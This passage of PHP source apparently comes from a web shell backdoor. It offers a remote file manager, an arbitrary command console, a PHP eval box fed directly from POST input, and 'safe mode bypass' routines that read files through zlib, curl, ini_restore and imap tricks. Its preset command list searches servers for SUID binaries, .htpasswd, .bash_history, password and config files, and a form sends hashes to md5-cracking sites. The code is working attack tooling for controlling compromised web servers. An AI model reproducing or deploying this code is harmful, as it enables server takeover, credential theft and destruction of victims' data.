    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    if( empty($_POST['p2']) )
        $_POST['p2'] = 'view';
    if( is_file($_POST['p1']) )
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');
    else
        $m = array('Chmod', 'Rename', 'Touch');
    foreach($m as $v)
        echo '<a href=# onclick="g(null,null,'' . urlencode($_POST['p1']) . '',''.strtolower($v).'')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
    echo '<br><br>';
    switch($_POST['p2']) {
        case 'view':
            echo '<pre class=ml1>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</pre>';
            break;
        case 'highlight':
            if( @is_readable($_POST['p1']) ) {
                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
                $oRb = @highlight_file($_POST['p1'],true);
                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$oRb).'</div>';
            }
            break;
        case 'chmod':
            if( !empty($_POST['p3']) ) {
                $perms = 0;
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
                if(!@chmod($_POST['p1'], $perms))
                    echo 'Can't set permissions!<br><script>document.mf.p3.value="";</script>';
            }
            clearstatcache();
            echo '<script>p3_="";</script><form onsubmit="g(null,null,'' . urlencode($_POST['p1']) . '',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="submit"></form>';
            break;
        case 'edit':
            if( !is_writable($_POST['p1'])) {
                echo 'File isn't writeable';
                break;
            }
            if( !empty($_POST['p3']) ) {
                $time = @filemtime($_POST['p1']);
                $_POST['p3'] = substr($_POST['p3'],1);
                $fp = @fopen($_POST['p1'],"w");
                if($fp) {
                    @fwrite($fp,$_POST['p3']);
                    @fclose($fp);
                    echo 'Saved!<br><script>p3_="";</script>';
                    @touch($_POST['p1'],$time,$time);
                }
            }
            echo '<form onsubmit="g(null,null,'' . urlencode($_POST['p1']) . '',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</textarea><input type=submit value="submit"></form>';
            break;
        case 'hexdump':
            $c = @file_get_contents($_POST['p1']);
            $n = 0;
            $h = array('00000000<br>','','');
            $len = strlen($c);
            for ($i=0; $i<$len; ++$i) {
                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                switch ( ord($c[$i]) ) {
                    case 0:  $h[2] .= ' '; break;
                    case 9:  $h[2] .= ' '; break;
                    case 10: $h[2] .= ' '; break;
                    case 13: $h[2] .= ' '; break;
                    default: $h[2] .= $c[$i]; break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
                    $h[1] .= '<br>';
                    $h[2] .= " ";
                }
             }
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#1a1a1a><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#202832><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
            break;
        case 'rename':
            if( !empty($_POST['p3']) ) {
                if(!@rename($_POST['p1'], $_POST['p3']))
                    echo 'Can't rename!<br>';
                else
                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
            }
            echo '<form onsubmit="g(null,null,'' . urlencode($_POST['p1']) . '',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="submit"></form>';
            break;
        case 'touch':
            if( !empty($_POST['p3']) ) {
                $time = strtotime($_POST['p3']);
                if($time) {
                    if(!touch($_POST['p1'],$time,$time))
                        echo 'Fail!';
                    else
                        echo 'Touched!';
                } else echo 'Bad time format!';
            }
            clearstatcache();
            echo '<script>p3_="";</script><form onsubmit="g(null,null,'' . urlencode($_POST['p1']) . '',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="submit"></form>';
            break;
        /* (С) 12.2015 mitryz */
        case 'frame':
            $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));
            if ($frameSrc[0] != '/')
                $frameSrc = '/' . $frameSrc;
            if ($frameSrc[strlen($frameSrc) - 1] != '/')
                $frameSrc = $frameSrc . '/';
            $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
            echo '<iframe width="100%" height="900px" scrolling="no" src='.$frameSrc.' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';
            break;
    }
    echo '</div>';
    hardFooter();
}
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -lha",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php",
          "find config* files" => "find / -type f -name "config*"",
          "find config* files in current dir" => "find . -type f -name "config*"",
          "find all writable folders and files" => "find / -perm -2 -ls",
          "find all writable folders and files in current dir" => "find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name service.pwd",
          "find service.pwd files in current dir" => "find . -type f -name service.pwd",
          "find all .htpasswd files" => "find / -type f -name .htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          "find all .bash_history files" => "find / -type f -name .bash_history",
          "find .bash_history files in current dir" => "find . -type f -name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"
    );
function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
    if(isset($_POST['ajax'])) {
        prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
        ob_start();
        echo "d.cf.cmd.value=''; ";
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes(" $ ".$_POST['p1']." ".ex($_POST['p1'])," '"));
        if(preg_match("!.*cds+([^;]+)$!",$_POST['p1'],$match))    {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "c_='".$GLOBALS['cwd']."';";
            }
        }
        echo "d.cf.output.value+='".$temp."';";
        echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        echo strlen($temp), " ", $temp;
        exit;
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
    hardHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
    var n = (window.Event) ? e.which : e.keyCode;
    if(n == 38) {
        cur--;
        if(cur>=0)
            document.cf.cmd.value = cmds[cur];
        else
            cur++;
    } else if(n == 40) {
        cur++;
        if(cur < cmds.length)
            document.cf.cmd.value = cmds[cur];
        else
            cur--;
    }
}
function add(cmd) {
    cmds.pop();
    cmds.push(cmd);
    cmds.push('');
    cur = cmds.length-1;
}
</script>";
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>';
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
    }
    echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>';
    if(!empty($_POST['p1'])) {
        echo htmlspecialchars("$ ".$_POST['p1']." ".ex($_POST['p1']));
    }
    echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
    echo '</form></div><script>d.cf.cmd.focus();</script>';
    hardFooter();
}
function actionPhp() {
    if( isset($_POST['ajax']) ) {
        $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        eval($_POST['p1']);
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean())," \'")."'; ";
        echo strlen($temp), " ", $temp;
        exit;
    }
    hardHeader();
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
        echo '<h1>PHP info</h1><div class=content>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace('!body {.*}!msiU','',$tmp);
        $tmp = preg_replace('!a:w+ {.*}!msiU','',$tmp);
        $tmp = preg_replace('!h1!msiU','h2',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
        echo $tmp;
        echo '</div><br>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    hardFooter();
}
function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
    if(!empty($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if ( is_array($_FILES['f']['tmp_name']) ) {
                    foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
                        if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
                                echo "Can't upload file!";
                            }
                        }
                    }
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($▟ = readdir($dh) ) !== false) {
                        $▟ = $path.$▟;
                        if ( (basename($▟) == "..") || (basename($▟) == ".") )
                            continue;
                        $type = filetype($▟);
                        if ($type == "dir")
                            deleteDir($▟);
                        else
                            @unlink($▟);
                    }
                    closedir($dh);
                    @rmdir($path);
                }
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_COOKIE['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = @opendir($c.$s);
                            while (($f = @readdir($h)) !== false)
                                if (($f != ".") and ($f != ".."))
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                        } elseif(is_file($c.$s))
                            @copy($c.$s, $d.$s);
                    }
                    foreach($_COOKIE['f'] as $f)
                        copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
                } elseif($_COOKIE['act'] == 'move') {
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = @opendir($c.$s);
                            while (($f = @readdir($h)) !== false)
                                if (($f != ".") and ($f != ".."))
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                        } elseif(@is_file($c.$s))
                            @copy($c.$s, $d.$s);
                    }
                    foreach($_COOKIE['f'] as $f)
                        @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
                } elseif($_COOKIE['act'] == 'zip') {
                    if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
                } elseif($_COOKIE['act'] == 'unzip') {
                    if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
                } elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
                }
                unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
                break;
            default:
                if(!empty($_POST['p1'])) {
                    prototype('act', $_POST['p1']);
                    prototype('f', serialize(@$_POST['f']));
                    prototype('c', @$_POST['c']);
                }
                break;
        }
    }
    hardHeader();
    echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
    $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
    if($dirContent === false) {    echo 'Can't open this folder!';hardFooter(); return; }
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
echo "<script>
    function sa() {
        for(i=0;i<d.files.elements.length;i++)
            if(d.files.elements[i].type == 'checkbox')
                d.files.elements[i].checked = d.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_".($sort[1]?0:1)."")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_".($sort[1]?0:1)."")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_".($sort[1]?0:1)."")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_".($sort[1]?0:1)."")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
                     'path' => $GLOBALS['cwd'].$dirContent[$i],
                     'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
                     'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                    );
        if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
            $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
        elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    $GLOBALS['sort'] = $sort;
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
        else
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
    }
    usort($files, "cmp");
    usort($dirs, "cmp");
    $files = array_merge($dirs, $files);
    $l = 0;
    foreach($files as $f) {
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g('FilesTools',null,''.urlencode($f['name']).'', 'view')">'.htmlspecialchars($f['name']):'g('FilesMan',''.$f['path'].'');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g('FilesTools',null,''.urlencode($f['name']).'','chmod')">'.$f['perms']
            .'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'touch')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g('FilesTools',null,''.urlencode($f['name']).'', 'download')">D</a>':'').'</td></tr>';
        $l = $l?0:1;
    }
    echo "<tr id=fak><td colspan=7>
    <input type=hidden name=ne value=''>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
    <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
    <label><select name='p1'>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>↳ Paste</option>";
    echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
    echo "<option value='tar'>+ tar.gz</option>";
    echo "</select></label>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='submit' style='margin-left:10px'></td></tr></form></table></div>";
    hardFooter();
}
function actionStringTools() {
    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
    $stringTools = array(
        'Base64 encode' => 'base64_encode',
        'Base64 decode' => 'base64_decode',
        'Url encode' => 'urlencode',
        'Url decode' => 'urldecode',
        'Full urlencode' => 'full_urlencode',
        'md5 hash' => 'md5',
        'sha1 hash' => 'sha1',
        'crypt' => 'crypt',
        'CRC32' => 'crc32',
        'ASCII to HEX' => 'ascii2hex',
        'HEX to ASCII' => 'hex2ascii',
        'HEX to DEC' => 'hexdec',
        'HEX to BIN' => 'hex2bin',
        'DEC to HEX' => 'dechex',
        'DEC to BIN' => 'decbin',
        'BIN to HEX' => 'binhex',
        'BIN to DEC' => 'bindec',
        'String to lower case' => 'strtolower',
        'String to upper case' => 'strtoupper',
        'Htmlspecialchars' => 'htmlspecialchars',
        'String length' => 'strlen',
    );
    if(isset($_POST['ajax'])) {
        prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
        ob_start();
        if(in_array($_POST['p1'], $stringTools))
            echo $_POST['p1']($_POST['p2']);
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean())," \'")."'; ";
        echo strlen($temp), " ", $temp;
        exit;
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
    hardHeader();
    echo '<h1>String conversions</h1><div class=content>';
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";
    foreach($stringTools as $k => $v)
        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
        echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"</pre></div><br><h1>Search files:</h1><div class=content>
        <form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>
            <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
            <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
            <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
            <tr><td></td><td><input type='submit' value='submit'></td></tr>
            </table></form>";
    function hardRecursiveGlob($path) {
        if(substr($path, -1) != '/')
            $path.='/';
        $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
        if(is_array($paths)&&@count($paths)) {
            foreach($paths as $▟) {
                if(@is_dir($▟)){
                    if($path!=$▟)
                        hardRecursiveGlob($▟);
                } else {
                    if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false)
                        echo "<a href='#' onclick='g("FilesTools",null,"".urlencode($▟)."", "view","")'>".htmlspecialchars($▟)."</a><br>";
                }
            }
        }
    }
    if(@$_POST['p3'])
        hardRecursiveGlob($_POST['c']);
    echo "</div><br><h1>Search for hash:</h1><div class=content>
        <form method='post' target='_blank' name='hf'>
            <input type='text' name='hash' style='width:330px;'><br>
            <input type='hidden' name='act' value='find'/><br>
            <input type='submit' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()">
            <input style='margin-left: 20px;' type='submit' value='md5decrypter.com' onclick="document.hf.action='https://www.md5decrypter.com/';document.hf.submit()"><br>
        </form></div>";
    hardFooter();
}
function actionSafeMode() {
    $temp='';
    ob_start();
    switch($_POST['p1']) {
        case 1:
            $temp=@tempnam($test, 'cx');
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @file_get_contents($temp);
                unlink($temp);
            } else
                echo 'Sorry... Can't open file';
            break;
        case 2:
            $files = glob($_POST['p2'].'*');
            if( is_array($files) )
                foreach ($files as $filename)
                    echo $filename." ";
            break;
        case 3:
            $ch = curl_init("file://".$_POST['p2']."x00".SELF_PATH);
            curl_exec($ch);
            break;
        case 4:
            ini_restore("safe_mode");
            ini_restore("open_basedir");
            include($_POST['p2']);
            break;
        case 5:
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                $uid = @posix_getpwuid($_POST['p2']);
                if ($uid)
                    echo join(':',$uid)." ";
            }
            break;
        case 6:
            if(!function_exists('imap_open'))break;
            $stream = imap_open($_POST['p2'], "", "");
            if ($stream == FALSE)
                break;
            echo imap_body($stream, 1);
            imap_close($stream);
            break;
    }
    $temp = ob_get_clean();
    hardHeader();
    echo '<h1>Safe mode bypass</h1><div class=content>';
    echo '<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6",this.param.value);return false;'><input type=text name=param><input type=submit value="submit"></form>';
    if($temp)
        echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
    echo '</div>';
    hardFooter();
}
function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
    die("<div align='center'><div class='container'><div class='sky'><div class='text'>THANK YOU & BYE</div><div class='stars'></div><div class='stars1'></div><div class='stars2'></div><div class='shooting-stars'></div></div></div></div>
